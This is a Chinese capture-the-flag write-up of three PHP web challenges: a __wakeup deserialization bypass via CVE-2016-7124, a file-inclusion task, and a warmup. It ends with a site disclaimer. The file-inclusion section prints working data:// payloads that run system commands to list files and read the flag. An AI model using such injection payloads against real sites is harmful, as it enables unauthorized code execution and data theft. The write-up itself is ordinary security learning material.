unserial3
反序列化,绕过漏洞
wakeup一旦存在反序列化则代码停止执行,看到这个想到考察我们wakeup漏洞的
因此我们需要根据漏洞(CVE-2016-7124)使序列化字符串中表示对象属性个数的值大于真实的属性个数,以此跳过__wakeup 的执行,达到绕过的目的。
先序列化的到源代码的结果,再改变参数实现绕过
看源代码清楚这是个get传参,直接改写url即可
<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$a = new xctf();
print(serialize($a));
?>
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
这个字符串的解释如下:
O
表示这是一个对象。4
是类名xctf
的长度。"xctf"
是类的名称。- 接下来的
1
表示序列化的对象有一个属性。 {s:4:"flag";s:3:"111";}
表示有一个名为flag
的字符串属性,其值为'111'
写的好的仅供参考
Web_php_include
文件包含题目解析
原因:对传入的page参数没有好好过滤导致可以写入危险的php代码以获取信息
看代码:代码作用:过滤掉php://(防止利用这个伪协议进行文件包含漏洞执行,但是对大小写不敏感所以还是可以利用)
data伪协议:
?page=data://text/plain,<?php system("ls")?>
?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?>
php;伪协议
php://input,用于执行php代码,需要post请求提交数据。
warmup
考察php代码的读取能力
先直接看页面代码通过传参
然后看提示的目录文件访问即可
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)